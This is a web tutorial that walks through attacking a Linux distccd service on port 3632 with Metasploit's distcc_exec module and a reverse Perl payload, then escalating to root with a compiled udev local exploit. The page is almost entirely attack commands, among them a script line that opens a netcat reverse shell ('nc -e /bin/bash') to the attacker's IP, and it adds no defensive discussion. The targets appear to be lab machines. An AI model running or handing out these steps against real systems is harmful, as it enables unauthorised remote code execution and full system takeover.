Attack Linux DistCC Daemon Port 3632

Ultimate Guide to Attack Linux DistCC Daemon Port 3632

Attack Linux DistCC Daemon – This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

Search Exploit

msf5 exploit(unix/misc/distcc_exec) > search distcc
msf5 exploit(unix/misc/distcc_exec) > info
Attack Linux DistCC

Find respective Payload

msf5 exploit(unix/misc/distcc_exec) > show payloads
msf5 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse_perl
Attack Linux DistCC
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 172.16.74.129
msf5 exploit(unix/misc/distcc_exec) > set LHOST 172.16.74.128
msf5 exploit(unix/misc/distcc_exec) > show options
Ultimate Guide to Attack Linux DistCC Daemon Port 3632
msf5 exploit(unix/misc/distcc_exec) > exploit
Ultimate Guide to Attack Linux DistCC Daemon Port 3632
hostname
ip a
whoami

We Don’t have Root, now what?

Privileged Escalation

gcc /usr/share/exploitdb/exploits/linux/local/8572.c -o /root/PriveEscal
upload /root/PriveEscal /tmp/PriveEscal
echo '#!/bin/bash' > /tmp/run
echo '/bin/nc -e /bin/bash 172.16.74.128 4445' >> /tmp/run
ps -eaf | grep udev | grep -v grep
Substract 1 to your PID
./PriveEscal 2743

https://www.exploit-db.com/exploits/8572

https://www.debian.org/security/2009/dsa-1772

https://www.securityfocus.com/bid/34536

Leave a Comment

Are you excited?We are giving away a $50 gift card every day

Don’t miss the chance to participate in the biggest giveaway of this year.

Newsletter Signup

Subscribe to our weekly newsletter below and never miss the latest product or an exclusive offer.